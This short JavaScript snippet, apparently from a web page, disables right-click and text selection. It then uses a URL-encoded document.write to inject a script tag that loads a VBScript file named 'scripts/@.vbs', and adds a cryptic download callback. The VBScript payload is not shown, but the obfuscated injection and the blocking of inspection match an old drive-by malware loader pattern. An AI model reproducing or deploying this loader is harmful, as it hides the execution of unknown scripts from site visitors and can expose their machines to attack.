document.oncontextmenu = function(){return false}
// XD
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable}
//XD
document.write(unescape("%3Cscript%20src%3D%22scripts/@.vbs%22%20language%3D%22vbs%22%3E%3C/script%3E"));
// XD
   function onDownloadDone(code){
    return_code(code)
    }
// OOO